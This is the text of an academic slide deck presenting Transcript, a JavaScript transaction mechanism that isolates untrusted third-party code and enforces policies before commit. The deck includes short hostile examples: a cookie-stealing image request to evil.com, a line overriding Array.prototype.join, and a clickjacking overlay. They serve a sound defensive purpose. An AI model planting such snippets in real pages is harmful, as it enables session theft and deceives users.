Enhancing JavaScript with Transactions
Mohan Dhawan†, Chung-chieh Shan‡ and Vinod Ganapathy†
†Department of Computer Science, Rutgers University
‡School of Informatics and Computing, Indiana University
April 21, 2023 ECOOP 2012 1
Problem
Web applications include third party content
  Examples: widgets, advertisements, libraries
  May contain untrusted, malicious JavaScript
Example from nytimes.com
Rogue third party advertisement
  Displayed image of fake virus scan
  Client security and privacy at risk
Solution: Transcript
Extend JavaScript to support Transactions
  Execute untrusted content speculatively
  Commit changes after policy enforcement
(Figure: the untrusted content runs inside a Transaction embedded in the Web Application.)
Goal
Protect the Web application from security violating actions of untrusted JavaScript
  Must handle arbitrary third party code written in JavaScript
    Including constructs such as eval, this, with.
  Must enforce powerful security policies
    Allow pop-ups from white-listed websites only.
    Dis-allow innerHTML in the context of host Web application.
Contributions
JavaScript transactions
  Speculative execution of unmodified third party JavaScript code
Transaction suspend/resume
  Allow host Web application to mediate external actions like DOM and AJAX operations
Speculative DOM updates
Schematic use of Transcript
// Web application code
var tx = transaction {
  ... // unmodified 3rd party code
  ...
};
// Introspection block goes below
/* policy enforcement code */
// validate actions of the transaction
tx.commit();
// Rest of the Web application code
Example: Untrusted code
// Web application code
var tx = transaction {
  var image = document.createElement("img");
  var url = "http://evil.com/grabcookie.php";
  var params = document.cookie;
  image.src = url + "?cookie=" + params;
  document.body.appendChild(image);
  ...
  Array.prototype.join = function() { return "evilString"; };
};
Transaction suspend and resume: the Transcript runtime system (figure)
// Web application code
tx = transaction {
  ...
  body.appendChild(image);
  ...
};
do {
  ...
  tx = tx.resume();
  ...
} while (tx.isSuspended());
tx.commit();
// Rest of the Web application
Figure captions:
  Transcript clones the host's DOM (DOMorig) when the transaction starts; the guest runs against the clone (DOMTX).
  On a transaction suspend, the Transcript runtime saves (i) the read/write sets, (ii) the speculative DOM, and (iii) the stack frames up to the nearest transaction delimiter to create a Transaction object tx.
  In the introspection block, the host performs the action (appendChild) on behalf of the guest: DOMTX + image gives DOM'TX.
  The Transcript runtime loads the saved read/write sets and stack frames when the transaction resumes.
  Commit labels in the figure: tx's write set + Heaporig gives Heapnew; DOM'TX becomes DOMnew.
Transaction suspend and resume
var tx = transaction {
  ...
  document.body.appendChild(image);
};
do {
  var rs = tx.getReadSet(), arg = tx.getArgs();
  switch (tx.getCause()) {
    case "appendChild":
      // Policy: the host appends the node only if it is an image and the
      // guest has not read document.cookie
      if (arg[0].nodeName.match("IMG") &&
          !rs.checkMembership(document, "cookie"))
        obj.appendChild(arg[0]); // obj: the node the guest called appendChild on
      break;
  } /* end switch */
  tx = tx.resume();
} while (tx.isSuspended());
Read and Write Sets
var tx = transaction {
  ...
  Array.prototype.join = function() { return "evilString"; };
};
/* Introspection Code */
// Policy: do not commit if the guest wrote to any property of Array.prototype
var ws = tx.getWriteSet();
if (ws.checkMembership(Array.prototype, "*")) {
  to_commit = false;
}
// Rest of the web application code
Gluing
var tx = transaction {
  ...
  document.write('<script src="newcode.js"></s' + 'cript>');
};
// Introspection block
// Rest of the web application code
Implementation
Prototype implementation in Firefox 3.7a4
Added new JavaScript features
  transaction keyword and Transaction object
Modified SpiderMonkey op-codes to
  Log all object accesses
  Suspend on DOM / AJAX calls
Added speculative execution support for DOM operations
  Re-direct all node accesses to the cloned copy
Evaluation
Goals
  Study applicability of Transcript in isolating real guest code
  Measure performance impact on guest code and micro-benchmarks
  Demonstrate graceful recovery in presence of malicious and buggy guests
Methodology
  Isolated the guest code in a Web application using transactions
  Introspection block for each transaction enforced a number of general and domain specific policies
Applicability of Transcript
Applied Transcript on five JavaScript widgets and applications
  Stand-alone and library based
  No difference in behavior and functionality

Benchmark       Policy
JS Menu         No network or cookie access
Picture Puzzle  Disallow attaching key event handlers
Spell Checker   No XMLHttpRequest if cookies were read
GreyBox         iframes to whitelisted URLs only
Color Picker    No innerHTML in host's context
Performance - Application benchmarks
(Figure: application benchmark results.)
Overhead = 0.16s
Performance – Microbenchmarks (Function calls)
Microbenchmark                                Overhead
Native functions
  eval("if (true) true; false;")              6.87x
  fn.call(this, i)                            1.89x
External operations
  getElementById("checkbox")                  6.78x
  createElement("div")                        3.69x
  addEventListener("click", clk, false)       26.51x
  dispatchEvent(evt)                          1.20x
  document.write("<script>x = 1;</script>")   2.01x
  document.write("<b> Hi </b>")               1.26x
Performance – Microbenchmarks (JavaScript Events)
Average overhead of just 94 µs per event.
Event name                        Normalized overhead   Raw delay (µs)
Drag event (drag)                 1.71x                 97
Keyboard event (keypress)         1.16x                 150
Message event (message)           1.17x                 85
Mouse event (click)               1.54x                 86
Mouse event (mouseover)           2.05x                 88
Mutation event (DOMAttrModified)  2.14x                 88
UI Event (overflow)               1.97x                 61
Recovery: Clickjacking
document.write('<div style="z-index:-1; ...other size/loc params"> <a href="http://www.amazon.com"> Goto Amazon </a> </div>');
...
document.write('<div style="opacity: 0.0; z-index:0; ...same size/loc params"> <a href="http://evil.com"> Goto Amazon </a> </div>');
Related Work
Staged information flow in JavaScript: PLDI'09
  Hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code
Conscript: S&P'10
  Aspect-oriented framework to specify and enforce fine-grained security policies for Web applications
AdJail: Security'10
  Isolation mechanism to protect Web application content from malicious advertisements
Caja, FBJS, AdSafe, etc.
Conclusion
Transcript implements JavaScript transactions to provide isolation and recovery
  Suspend operations that break isolation
  Resume operation if web application allows
Enforcement of powerful security policies
  All data reads / writes are recorded
  Ability to inspect reads / writes before commit
No restriction or changes to third party code
Questions ?
Event handler wrapper generation
// Guest registers a handler inside the transaction
var tx = transaction {
  ...
  node.addEventListener("click", handler, false);
};
// Introspection block

// Transcript wraps the handler so that each event dispatch runs inside its own
// transaction, followed by the introspection block (iblock_func)
tx_handler = function(evt) {
  evt_tx = transaction { handler(evt); }
  iblock_func(evt_tx);
}

// Equivalent registration with the wrapped handler
var tx = transaction {
  ...
  node.addEventListener("click", tx_handler, false);
};
// Introspection block
A complete example
<script src="jsMenu.js" func="menu"></script>
<script>
(function () {
  var to_commit = true, e = eval; // indirect eval
  var tx = transaction {
    e(getFunctionBody(menu));
  };
  do {
    ... <application-specific-policies> ...
    tx = tx.resume();
  } while (tx.isSuspended());
  if (to_commit) tx.commit();
})();
</script>